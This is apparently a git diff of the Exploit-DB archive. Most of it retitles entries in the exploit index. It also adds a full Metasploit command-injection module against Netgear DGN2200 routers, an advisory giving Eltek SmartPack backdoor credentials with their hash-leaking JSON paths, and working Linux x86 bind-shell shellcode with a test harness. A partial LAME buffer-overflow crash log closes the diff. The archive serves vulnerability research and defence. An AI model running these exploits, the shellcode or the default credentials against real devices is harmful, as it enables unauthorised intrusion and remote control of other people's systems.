-11636,platforms/php/webapps/11636.php,"Kolang - proc_open PHP safe mode Bypass 4.3.10 - 5.3.0 Exploit",2010-03-05,"Hamid Ebadi",php,webapps,0
+11636,platforms/php/webapps/11636.php,"Kolang 4.3.10 < 5.3.0 - 'proc_open()' PHP 'safe_mode' Bypass Exploit",2010-03-05,"Hamid Ebadi",php,webapps,0
 11637,platforms/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - 'news.php' 'id' SQL Injection",2010-03-05,"Easy Laster",php,webapps,0
 11638,platforms/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script - (linkid) Blind SQL Injection",2010-03-05,JosS,php,webapps,0
 11641,platforms/php/webapps/11641.txt,"PHPCOIN 1.2.1 - 'mod.php' Local File Inclusion",2010-03-06,_mlk_,php,webapps,0
@ -24505,8 +24514,8 @@ id,file,description,date,author,platform,type,port
 15199,platforms/asp/webapps/15199.py,"Cilem Haber 1.4.4 (Tr) - Database Disclosure (Python)",2010-10-04,ZoRLu,asp,webapps,0
 15183,platforms/asp/webapps/15183.py,"Bka Haber 1.0 (Tr) - File Disclosure",2010-10-02,ZoRLu,asp,webapps,0
 15177,platforms/php/webapps/15177.pl,"iGaming CMS 1.5 - Blind SQL Injection",2010-10-01,plucky,php,webapps,0
-15185,platforms/asp/webapps/15185.txt,"SmarterMail 7.x (7.2.3925) - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0
+15185,platforms/asp/webapps/15185.txt,"SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting",2010-10-02,sqlhacker,asp,webapps,0
-15189,platforms/asp/webapps/15189.txt,"SmarterMail 7.x (7.2.3925) - LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0
+15189,platforms/asp/webapps/15189.txt,"SmarterMail < 7.2.3925 - LDAP Injection",2010-10-02,sqlhacker,asp,webapps,0
 15191,platforms/asp/webapps/15191.txt,"TradeMC E-Ticaret - SQL Injection / Cross-Site Scripting",2010-10-02,KnocKout,asp,webapps,0
 15194,platforms/php/webapps/15194.txt,"TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload",2010-10-03,Hackeri-AL,php,webapps,0
 15200,platforms/php/webapps/15200.txt,"FAQMasterFlex 1.2 - SQL Injection",2010-10-04,cyb3r.anbu,php,webapps,0
@ -24782,7 +24791,7 @@ id,file,description,date,author,platform,type,port
 15777,platforms/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injections",2010-12-19,"DeadLy DeMon",asp,webapps,0
 15779,platforms/php/webapps/15779.txt,"Joomla! Component JE Auto - Local File Inclusion",2010-12-19,Sid3^effects,php,webapps,0
 15781,platforms/php/webapps/15781.txt,"Inout Webmail Script - Persistent Cross-Site Scripting",2010-12-20,Sid3^effects,php,webapps,0
-15783,platforms/php/webapps/15783.txt,"MaticMarket 2.02 for PHP-Nuke - Local File Inclusion",2010-12-20,xer0x,php,webapps,0
+15783,platforms/php/webapps/15783.txt,"PHP-Nuke MaticMarket 2.02 - Local File Inclusion",2010-12-20,xer0x,php,webapps,0
 15784,platforms/asp/webapps/15784.txt,"Elcom CommunityManager.NET - Authentication Bypass",2010-12-20,"Sense of Security",asp,webapps,0
 15789,platforms/php/webapps/15789.txt,"plx Ad Trader 3.2 - Authentication Bypass",2010-12-20,R4dc0re,php,webapps,0
 15790,platforms/php/webapps/15790.txt,"PHP Web Scripts Ad Manager Pro 3.0 - SQL Injection",2010-12-20,R4dc0re,php,webapps,0
@ -25819,7 +25828,7 @@ id,file,description,date,author,platform,type,port
 18686,platforms/php/webapps/18686.txt,"SyndeoCMS 3.0.01 - Persistent Cross-Site Scripting",2012-03-30,"Ivano Binetti",php,webapps,0
 18687,platforms/php/webapps/18687.txt,"Landshop 0.9.2 - Multiple Web Vulnerabilities",2012-03-31,Vulnerability-Lab,php,webapps,0
 18689,platforms/php/webapps/18689.txt,"Woltlab Burning Board 2.2 / 2.3 - [WN]KT KickTipp 3.1 - SQL Injection",2012-03-31,"Easy Laster",php,webapps,0
-18690,platforms/php/webapps/18690.txt,"WordPress Plugin BuddyPress plugin 1.5.x < 1.5.5 - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0
+18690,platforms/php/webapps/18690.txt,"WordPress Plugin BuddyPress Plugin 1.5.x < 1.5.5 - SQL Injection",2012-03-31,"Ivan Terkin",php,webapps,0
 18694,platforms/php/webapps/18694.txt,"Simple PHP Agenda 2.2.8 - Cross-Site Request Forgery (Add Admin / Add Event)",2012-04-03,"Ivano Binetti",php,webapps,0
 18708,platforms/php/webapps/18708.txt,"GENU CMS - SQL Injection",2012-04-05,"hordcode security",php,webapps,0
 18711,platforms/php/webapps/18711.txt,"w-CMS 2.0.1 - Multiple Vulnerabilities",2012-04-06,Black-ID,php,webapps,0
@ -28732,7 +28741,7 @@ id,file,description,date,author,platform,type,port
 26425,platforms/php/webapps/26425.pl,"Woltlab 1.1/2.x - 'Info-DB Info_db.php' Multiple SQL Injections",2005-10-26,admin@batznet.com,php,webapps,0
 26426,platforms/asp/webapps/26426.html,"Techno Dreams Multiple Scripts - Multiple SQL Injections",2005-10-26,"farhad koosha",asp,webapps,0
 26427,platforms/php/webapps/26427.txt,"GCards 1.43 - 'news.php' SQL Injection",2005-10-26,svsecurity,php,webapps,0
-26428,platforms/php/webapps/26428.html,"Search Enhanced Module 1.1/2.0 for PHP-Nuke - HTML Injection",2005-10-26,bhfh01,php,webapps,0
+26428,platforms/php/webapps/26428.html,"PHP-Nuke Search Enhanced Module 1.1/2.0 - HTML Injection",2005-10-26,bhfh01,php,webapps,0
 26429,platforms/asp/webapps/26429.txt,"Novell ZENworks Patch Management 6.0.52 - computers/default.asp Direction Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0
 26430,platforms/asp/webapps/26430.txt,"Novell ZENworks Patch Management 6.0.52 - reports/default.asp Multiple Parameter SQL Injection",2005-10-27,"Dennis Rand",asp,webapps,0
 26431,platforms/php/webapps/26431.txt,"ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution",2005-10-27,"Andreas Sandblad",php,webapps,0
@ -31030,7 +31039,7 @@ id,file,description,date,author,platform,type,port
 30050,platforms/php/webapps/30050.html,"WordPress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0
 30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - 'Server.php' Full Path Disclosure",2007-05-17,kefka,php,webapps,0
 30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0
-30054,platforms/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass & Persistent Exploit",2013-12-05,Vulnerability-Lab,jsp,webapps,0
+30054,platforms/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass / Persistent Exploit",2013-12-05,Vulnerability-Lab,jsp,webapps,0
 30055,platforms/ios/webapps/30055.txt,"Wireless Transfer App 3.7 iOS - Multiple Web Vulnerabilities",2013-12-05,Vulnerability-Lab,ios,webapps,0
 30201,platforms/php/webapps/30201.txt,"Fuzzylime 1.0 - Low.php Cross-Site Scripting",2007-06-18,RMx,php,webapps,0
 30156,platforms/cgi/webapps/30156.txt,"CGILua 3.0 - SQL Injection",2013-12-09,"aceeeeeeeer .",cgi,webapps,0
@ -33166,7 +33175,7 @@ id,file,description,date,author,platform,type,port
 32969,platforms/php/webapps/32969.txt,"IceWarp Merak Mail Server 9.4.1 - 'cleanHTML()' Function Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
 32973,platforms/hardware/webapps/32973.txt,"Sixnet Sixview 2.4.1 - Web Console Directory Traversal",2014-04-22,"daniel svartman",hardware,webapps,0
 32976,platforms/php/webapps/32976.php,"No-CMS 0.6.6 rev 1 - Admin Account Hijacking / Remote Code Execution via Static Encryption Key",2014-04-22,"Mehmet Ince",php,webapps,0
-34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass & Persistent Exploit",2014-07-23,Vulnerability-Lab,multiple,webapps,0
+34148,platforms/multiple/webapps/34148.txt,"Barracuda Networks #35 Web Firewall 610 6.0.1 - Filter Bypass / Persistent Exploit",2014-07-23,Vulnerability-Lab,multiple,webapps,0
 32983,platforms/php/webapps/32983.txt,"kitForm CRM Extension 0.43 - 'sorter.ph' 'sorter_value' Parameter SQL Injection",2014-04-22,chapp,php,webapps,80
 32985,platforms/php/webapps/32985.xml,"IceWarp Merak Mail Server 9.4.1 - 'item.php' Cross-Site Scripting",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
 32986,platforms/php/webapps/32986.py,"IceWarp Merak Mail Server 9.4.1 - 'Forgot Password' Input Validation",2009-05-05,"RedTeam Pentesting GmbH",php,webapps,0
@ -34420,7 +34429,7 @@ id,file,description,date,author,platform,type,port
 35142,platforms/php/webapps/35142.txt,"Social Share - 'search' Parameter Cross-Site Scripting",2010-12-23,"Aliaksandr Hartsuyeu",php,webapps,0
 35143,platforms/php/webapps/35143.txt,"HotWeb Scripts HotWeb Rentals - 'PageId' Parameter SQL Injection",2010-12-28,"non customers",php,webapps,0
 35145,platforms/php/webapps/35145.txt,"Pligg CMS 1.1.3 - 'range' Parameter SQL Injection",2010-12-27,Dr.NeT,php,webapps,0
-35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - Bypass disable_functions Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
+35146,platforms/php/webapps/35146.txt,"PHP < 5.6.2 - 'disable_functions()' Bypass Exploit (Shellshock)",2014-11-03,"Ryan King (Starfall)",php,webapps,0
 35149,platforms/php/webapps/35149.txt,"LiveZilla 3.2.0.2 - 'Track' Module 'server.php' Cross-Site Scripting",2010-12-27,"Ulisses Castro",php,webapps,0
 35150,platforms/php/webapps/35150.php,"Drupal < 7.32 - Unauthenticated SQL Injection",2014-11-03,"Stefan Horst",php,webapps,443
 35155,platforms/php/webapps/35155.txt,"CruxCMS 3.0 - Multiple Input Validation Vulnerabilities",2010-12-26,ToXiC,php,webapps,0
@ -35327,7 +35336,7 @@ id,file,description,date,author,platform,type,port
 36613,platforms/php/webapps/36613.txt,"WordPress Plugin Simple Ads Manager - Multiple SQL Injections",2015-04-02,"ITAS Team",php,webapps,80
 36614,platforms/php/webapps/36614.txt,"WordPress Plugin Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80
 36615,platforms/php/webapps/36615.txt,"WordPress Plugin Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80
-36616,platforms/php/webapps/36616.txt,"phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection",2015-04-02,@u0x,php,webapps,80
+36616,platforms/php/webapps/36616.txt,"phpSFP Schedule Facebook Posts 1.5.6 - SQL Injection",2015-04-02,@u0x,php,webapps,80
 36617,platforms/php/webapps/36617.txt,"WordPress Plugin VideoWhisper Video Presentation 3.31.17 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
 36618,platforms/php/webapps/36618.txt,"WordPress Plugin VideoWhisper Video Conference Integration 4.91.8 - Arbitrary File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80
 36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0
@ -35775,7 +35784,7 @@ id,file,description,date,author,platform,type,port
 37309,platforms/php/webapps/37309.txt,"phpCollab 2.5 - Database Backup Information Disclosure",2012-05-23,"team ' and 1=1--",php,webapps,0
 37310,platforms/php/webapps/37310.txt,"Ajaxmint Gallery 1.0 - Local File Inclusion",2012-05-23,AkaStep,php,webapps,0
 37311,platforms/php/webapps/37311.txt,"Pligg CMS 1.x - 'module.php' Multiple Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0
-37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 - modules.php URI Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0
+37312,platforms/php/webapps/37312.txt,"pragmaMx 1.12.1 - 'modules.php' URI Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0
 37313,platforms/php/webapps/37313.txt,"pragmaMx 1.12.1 - includes/wysiwyg/spaw/editor/plugins/imgpopup/img_popup.php img_url Parameter Cross-Site Scripting",2012-05-23,"High-Tech Bridge SA",php,webapps,0
 37314,platforms/php/webapps/37314.txt,"Yellow Duck Framework 2.0 Beta1 - Local File Disclosure",2012-05-23,L3b-r1'z,php,webapps,0
 37315,platforms/php/webapps/37315.txt,"PHPCollab 2.5 - 'uploadfile.php' Crafted Request Arbitrary Non-PHP File Upload",2012-05-24,"team ' and 1=1--",php,webapps,0
@ -36794,7 +36803,7 @@ id,file,description,date,author,platform,type,port
 39179,platforms/php/webapps/39179.txt,"CMS Touch - 'news.php' News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0
 39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0
 39187,platforms/asp/webapps/39187.txt,"CIS Manager - 'email' Parameter SQL Injection",2014-05-16,Edge,asp,webapps,0
-39188,platforms/php/webapps/39188.txt,"Glossaire Module for XOOPS - '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0
+39188,platforms/php/webapps/39188.txt,"XOOPS Glossaire Module- '/modules/glossaire/glossaire-aff.php' SQL Injection",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0
 39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX - Multiple SQL Injections",2014-05-19,AtT4CKxT3rR0r1ST,php,webapps,0
 39190,platforms/php/webapps/39190.php,"WordPress Plugin cnhk-Slideshow - Arbitrary File Upload",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0
 39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager - 'backend/PHP/src/setup/rpc.php' Remote Code Execution",2014-05-20,"Manish Tanwar",php,webapps,0
@ -36946,7 +36955,7 @@ id,file,description,date,author,platform,type,port
 39507,platforms/php/webapps/39507.txt,"WordPress Plugin More Fields 2.1 - Cross-Site Request Forgery",2016-02-29,"Aatif Shahdad",php,webapps,80
 39513,platforms/php/webapps/39513.txt,"WordPress Plugin CP Polls 1.0.8 - Multiple Vulnerabilities",2016-03-01,"i0akiN SEC-LABORATORY",php,webapps,80
 39521,platforms/php/webapps/39521.txt,"WordPress Plugin Bulk Delete 5.5.3 - Privilege Escalation",2016-03-03,"Panagiotis Vagenas",php,webapps,80
-39524,platforms/php/webapps/39524.js,"ATutor LMS - install_modules.php Cross-Site Request Forgery / Remote Code Execution",2016-03-07,mr_me,php,webapps,0
+39524,platforms/php/webapps/39524.js,"ATutor LMS - 'install_modules.php' Cross-Site Request Forgery / Remote Code Execution",2016-03-07,mr_me,php,webapps,0
 39526,platforms/php/webapps/39526.sh,"Cerberus Helpdesk (Cerb5) 5 < 6.7 - Password Hash Disclosure",2016-03-07,asdizzle_,php,webapps,80
 39534,platforms/php/webapps/39534.html,"Bluethrust Clan Scripts v4 R17 - Multiple Vulnerabilities",2016-03-09,"Brandon Murphy",php,webapps,80
 39536,platforms/php/webapps/39536.txt,"WordPress Theme SiteMile Project 2.0.9.5 - Multiple Vulnerabilities",2016-03-09,"LSE Leading Security Experts GmbH",php,webapps,80
@ -37166,7 +37175,7 @@ id,file,description,date,author,platform,type,port
 40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 / 11 - 'main.swf' Hard-Coded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
 40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
 40112,platforms/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,cgi,webapps,80
-40114,platforms/php/webapps/40114.py,"vBulletin 5.x/4.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
+40114,platforms/php/webapps/40114.py,"vBulletin 4.x/5.x - Authenticated Persistent Cross-Site Scripting in AdminCP/ApiLog via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
 40115,platforms/php/webapps/40115.py,"vBulletin 4.x - Authenticated SQL Injection in breadcrumbs via xmlrpc API",2014-10-12,tintinweb,php,webapps,0
 40193,platforms/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",php,webapps,80
 40171,platforms/linux/webapps/40171.txt,"AXIS Multiple Products - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,linux,webapps,80
@ -38071,3 +38080,4 @@ id,file,description,date,author,platform,type,port
 42197,platforms/hardware/webapps/42197.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",hardware,webapps,0
 42205,platforms/php/webapps/42205.html,"WonderCMS 2.1.0 - Cross-Site Request Forgery",2017-06-19,"Ehsan Hosseini",php,webapps,0
 42221,platforms/php/webapps/42221.py,"PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution",2017-06-21,phackt_ul,php,webapps,0
 42252,platforms/hardware/webapps/42252.txt,"Eltek SmartPack - Backdoor Account",2017-06-26,"Saeed reza Zamanian",hardware,webapps,0
--- a/platforms/cgi/remote/42257.rb
+++ b/platforms/cgi/remote/42257.rb
@ -0,0 +1,108 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 require 'net/http'
 require "base64"
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info = {})
    super(update_info(info,
      'Name'                 => "Netgear DGN2200 dnslookup.cgi Command Injection",
      'Description'          => %q{
        This module exploits a command injection vulnerablity in NETGEAR
        DGN2200v1/v2/v3/v4 routers by sending a specially crafted post request
        with valid login details.
      },
      'License'              => MSF_LICENSE,
      'Platform'             => 'unix',
      'Author'               => [
        'thecarterb',  # Metasploit Module
        'SivertPL'     # Vuln discovery
      ],
      'DefaultTarget'        => 0,
      'Privileged'           => true,
      'Arch'                 => [ARCH_CMD],
      'Targets'              => [
        [ 'NETGEAR DDGN2200 Router', { } ]
      ],
      'References'           =>
        [
          [ 'EDB', '41459'],
          [ 'CVE', '2017-6334']
        ],
      'DisclosureDate' => 'Feb 25 2017',
    ))
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('USERNAME', [true, 'Username to authenticate with', '']),
        OptString.new('PASSWORD', [true, 'Password to authenticate with', ''])
      ])
    register_advanced_options(
    [
      OptString.new('HOSTNAME', [true, '"Hostname" to look up (doesn\'t really do anything important)', 'www.google.com'])
    ])
    end
  # Requests the login page which tells us the hardware version
  def check
    res = send_request_cgi({'uri'=>'/'})
    if res.nil?
      fail_with(Failure::Unreachable, 'Connection timed out.')
    end
     # Checks for the `WWW-Authenticate` header in the response
    if res.headers["WWW-Authenticate"]
      data = res.to_s
      marker_one = "Basic realm=\"NETGEAR "
      marker_two = "\""
      model = data[/#{marker_one}(.*?)#{marker_two}/m, 1]
      vprint_status("Router is a NETGEAR router (#{model})")
      model_numbers = ['DGN2200v1', 'DGN2200v2', 'DGN2200v3', 'DGN2200v4']
      if model_numbers.include?(model)
        print_good("Router may be vulnerable (NETGEAR #{model})")
        return CheckCode::Detected
      else
        return CheckCode::Safe
      end
    else
      print_error('Router is not a NETGEAR router')
      return CheckCode::Safe
    end
  end
  def exploit
    check
    # Convert datastores
    user = datastore['USERNAME']
    pass = datastore['PASSWORD']
    hostname = datastore['HOSTNAME']
    vprint_status("Using encoder: #{payload.encoder} ")
    print_status('Sending payload...')
    vprint_status("Attempting to authenticate with: #{user}:#{pass} (b64 encoded for auth)")
    creds_combined = Base64.strict_encode64("#{user}:#{pass}")
    vprint_status("Encoded authentication: #{creds_combined}")
    res = send_request_cgi({
      'uri'         => '/dnslookup.cgi',
      'headers'     => {
        'Authorization' => "Basic #{creds_combined}"
      },
      'vars_post'   => {
        'lookup'    => 'Lookup',
        'host_name' => hostname + '; ' + payload.encoded
    }})
  end
 end
--- a/platforms/hardware/webapps/42252.txt
+++ b/platforms/hardware/webapps/42252.txt
@ -0,0 +1,86 @@
 Eltek SmartPack - Backdoor Account
 Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
 Product: Eltek SmartPack
 Vendor: http://www.eltek.com/
 Product Link : http://www.eltek.com/detail_products.epl?k1=25507&id=1123846
 About Product:
 The Smartpack controller is a powerful and cost-effective module, developed for monitoring and controlling a wide range of Elte's DC power supply systems.
 You operate the system from the front panel, locally via a PC using the PowerSuite PC application, or remotely via modem, Ethernet and the Web. The module then utilizes the USB- or RS-232 ports to interface with a local PC, SNMP or Web adapters.
 Vulnerability Report:
 In Eltek Management Section, on following path, some json files (sush as cfgUseraccount1.json to cfgUseraccount10.json) will be called , that disclose some of pre-defined system users.
 the json response is containing username and password (hashed in MD5), if you crack the MD5 hashes to plain text you can be able to login in the system. (same as bellow).
 Please Note: the users were not note in users manual.
 control:control
 status:status
 Path:
 system conf>Devuce Settings>User Accounts
 -----------------------------
 json Path:
 http://10.211.7.70/RPC/Eltek/cfgUseraccount1.json
 to .....
 http://10.211.7.70/RPC/Eltek/cfgUseraccount10.json
 -----------------------------
 json responses:
 {
 	"jsonrpc":	"2.0",
 	"result":	[{
 			"Path":	"SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgLevel:vU8int1"
 ,
 			"Value":	2
 		}, {
 			"Path":	"SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgUser:vString21"
 ,
 			"Value":	"control"
 		}, {
 			"Path":	"SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword:vString21"
 ,
 			"Value":	"fc5364bf9dbfa34954526becad136d4b"
 		}, {
 			"Path":	"SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword_new
 :vString21",
 			"Value":	null
 		}, {
 			"Path":	"SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword_renew
 :vString21",
 			"Value":	null
 		}],
 	"id":	21
 -------------------------------------------------------------------------------------------
 {
 	"jsonrpc":	"2.0",
 	"result":	[{
 			"Path":	"SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgLevel:vU8int1"
 ,
 			"Value":	1
 		}, {
 			"Path":	"SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgUser:vString21"
 ,
 			"Value":	"status"
 		}, {
 			"Path":	"SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword:vString21"
 ,
 			"Value":	"9acb44549b41563697bb490144ec6258"
 		}, {
 			"Path":	"SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword_new
 :vString21",
 			"Value":	null
 		}, {
 			"Path":	"SystemType_ControlSystem.1.ControlUnitPart_security.0.Object_user.UserId_cfgPassword_renew
 :vString21",
 			"Value":	null
 		}],
 	"id":	8
 }
 -------------------------------------------------------------------------------------------
 #EOF
--- a/platforms/lin_x86/shellcode/42254.c
+++ b/platforms/lin_x86/shellcode/42254.c
@ -0,0 +1,98 @@
 /*
 Architecture	: x86
 OS		: Linux
 Author		: wetw0rk
 ID		: SLAE-958
 Shellcode Size	: 75 bytes
 Bind Port	: 4444
 Description	: A linux/x86 bind shell via /bin/sh. Created by analysing msfvenom;
 		  original payload was 78 bytes and contained 1 NULL. My shellcode
 		  is 75 and contains 0 NULLS ;).
 Original Metasploit Shellcode:
 	sudo msfvenom -p linux/x86/shell_bind_tcp -b "\x00" -f c --smallest -i 0
 Test using:
 	gcc -fno-stack-protector -z execstack tshell.c
 SECTION .text
 global _start
 _start:
        ; int socketcall(int call, unsigned long *args) remember to place backwards!
        push 102                ; syscall for socketcall() 102
        pop eax                 ; POP 102 into EAX
        cdq                     ; EDX = 0 (saves space)
        push ebx                ; PUSH EBX(0) onto stack (IPPROTO_IP = 0)
        inc ebx                 ; INC-rement EBX by 1
        push ebx                ; PUSH EBX(1) onto stack (SOCK_STREAM = 1)
        push 2                  ; PUSH 2 onto stack (AF_INET = 2)
        mov ecx,esp             ; top of stack contains our arguments save address in ECX
        int 80h                 ; call that kernel!!
        ; int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
        pop ebx                 ; POP stack(2 = SYS_BIND = bind()) into EBX
        pop esi                 ; POP stack(1) into ESI we dont need it
        push edx                ; PUSH EDX(0) onto the stack (INADDR_ANY = 0)
        push word 0x5c11        ; PUSH 0x5c11 onto the stack (PORT:4444)
        push edx                ; PUSH 00 onto the stack
        push byte 0x02          ; PUSH 02 onto the stack (AF_INET = 2)
        push 16                 ; PUSH 16 onto the stack (ADDRLEN = 16)
        push ecx                ; PUSH ECX(struct pointer) onto the stack
        push eax                ; PUSH EAX(socket file descriptor) onto stack
        mov ecx,esp             ; top of stack contains our argument array save it in ECX
        mov al,102              ; syscall for socketcall() 102
        int 80h                 ; call that kernel!!
        ; int listen(int sockfd, int backlog)
        mov [ecx+4],eax         ; zero out [ECX+4]
        mov bl,4                ; MOV (4 = SYS_LISTEN = listen()) into BL
        mov al,102              ; make syscall for socketcall()
        int 80h                 ; call the kernel!!
        ; accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
        inc ebx                 ; EBX(5) = SYS_ACCEPT = accept()
        mov al,102              ; make syscall for socketcall()
        int 80h                 ; call the kernel!!
        xchg eax,ebx            ; Put socket descriptor in EBX and 0x5 in EAX
        pop ecx                 ; POP 3 into ECX for counter
 loop:
        ; int dup2(int oldfd, int newfd)
        mov al,63               ; syscall for dup2()
        int 80h                 ; call the kernel!!
        dec ecx                 ; count down to zero
        jns loop                ; If SF not set, ECX not negative so continue looping
 done:
        ; int execve(const char *filename, char *const argv[], char *const envp[])
        push dword 0x68732f2f   ; PUSH hs// onto stack
        push dword 0x6e69622f   ; PUSH nib/ onto stack
        mov ebx,esp             ; put the address of "/bin//sh" into EBX via ESP
        push eax                ; PUSH nulls for string termination
        mov ecx,esp             ; store argv array into ECX via the stack or ESP
        mov al,11               ; make execve() syscall or 11
        int 80h                 ; call then kernel!!
 */
 #include <stdio.h>
 #include <string.h>
 unsigned char code[]= \
 "\x6a\x66\x58\x99\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x5b\x5e\x52"
 "\x66\x68\x11\x5c\x52\x6a\x02\x6a\x10\x51\x50\x89\xe1\xb0\x66\xcd"
 "\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x93"
 "\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x2f\x2f\x73\x68\x68\x2f\x62"
 "\x69\x6e\x89\xe3\x50\x89\xe1\xb0\x0b\xcd\x80";
 int main()
 {
 	printf("Shellcode Length: %d\n", strlen(code));
 	int (*ret)() = (int(*)())code;
 	ret();
 }
--- a/platforms/linux/dos/42258.txt
+++ b/platforms/linux/dos/42258.txt
@ -0,0 +1,91 @@
 Description:
 lame is a high quality MPEG Audio Layer III (MP3) encoder licensed under the LGPL.
 Few notes before the details of this bug. Time ago a fuzz was done by Brian Carpenter and Jakub Wilk which posted the results on the debian bugtracker. In cases like this, when upstream is not active and people do not post on the upstream bugzilla is easy discover duplicates, so I downloaded all available testcases, and noone of the bug you will see on my blog is a duplicate of an existing issue. Upstream seems a bit dead, latest release was into 2011, so this blog post will probably forwarded on the upstream bugtracker just for the record.
 The complete ASan output of the issue:
 # lame -f -V 9 $FILE out.wav
 ==27479==ERROR: AddressSanitizer: global-buffer-overflow on address 0x7f598d317f20 at pc 0x7f598d2b246b bp 0x7ffe780cf310 sp 0x7ffe780cf308
 READ of size 2 at 0x7f598d317f20 thread T0
    #0 0x7f598d2b246a in II_step_one /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer2.c:144:36
    #1 0x7f598d2b246a in decode_layer2_frame /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/layer2.c:375
    #2 0x7f598d29b377 in decodeMP3_clipchoice /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/interface.c:611:13
    #3 0x7f598d298c13 in decodeMP3 /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/mpglib/interface.c:696:12
    #4 0x7f598d259092 in decode1_headersB_clipchoice /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:149:11
    #5 0x7f598d25e94a in hip_decode1_headersB /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:436:16
    #6 0x7f598d25e94a in hip_decode1_headers /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/libmp3lame/mpglib_interface.c:379
    #7 0x51e984 in lame_decode_fromfile /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:2089:11
    #8 0x51e984 in read_samples_mp3 /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:877
    #9 0x51e984 in get_audio_common /var/tmp/portage/media-sound/lame-3.99.5-r1/work/lame-3.99.5/frontend/get_audio.c:785
